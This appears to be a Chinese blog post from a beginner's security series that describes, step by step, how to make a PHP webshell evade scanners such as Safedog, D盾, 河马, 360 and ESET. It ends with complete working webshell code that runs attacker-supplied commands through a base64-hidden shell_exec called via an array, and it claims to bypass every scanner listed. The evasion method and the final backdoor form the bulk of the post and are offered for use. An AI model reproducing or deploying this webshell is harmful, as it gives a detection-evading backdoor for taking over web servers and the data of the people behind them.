从0到1学习网络安全 【制作一匹过狗马】

研究了下过狗php小马,分享一下制作的过程

注:今后继续定期更新---“实战”!


Step1:制作了一个执行命令的小马,用查杀工具扫描一下发现河马竟然没告警...
原因可能是,我用变量代替了shell_exec 字符。
3.php
安全狗,D盾告警分别如下:
安全狗告警.png

D盾告警.png


Step2:在原有代码上添加方法把执行命令那段代码括起来,安全狗绕过。
2.php
D盾依然告警(内藏可疑变量函数):
D盾告警.png


Step3:再加一个变量,D盾依然告警但是威胁等级降低了!不过好像加这个变量确实没啥用。
1.php
D盾告警如下(变量函数):
D盾告警.png


Step4:既然变量代替shell_exec会告警,我换成数组试试:
0.php
绕过成功,根据查杀软件给出的提示想出对应的绕过方式,过狗就很简单了。
查杀软件告警.php

最终代码:

<?php   
//pwd=iChina
//测试结果通杀以下软件:360企业专业版、安全狗、河马、D盾、ESET
function payload($cmd,$pwd,$func)
{
    //执行命令
    if ($pwd=='c256b667c0bfd5b0cd0f0e77976a37e7') {
        $array = array($func,"-","-");
        $result = $array[0]($cmd);
        echo $result;
    } else {
        echo 'Password is wrong!';
    }
}
if (isset($_GET['cmd'])&&isset($_GET['pwd'])) {
    $cmd = $_GET['cmd'];
    $pwd = md5($_GET['pwd']);
    $func = base64_decode('c2hlbGxfZXhlYw==');
    payload($cmd,$pwd,$func);
} else {
    echo 'Please input password!';
}
?>
第一次写过狗马,大佬勿喷


由于小编也在学习中,写的不好各位勿喷。
从0到1学习网络安全 【目录】

实战靶场环境迁移:

https://mp.weixin.qq.com/s/5Nat58sq85CmnW-kWXAOsw

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容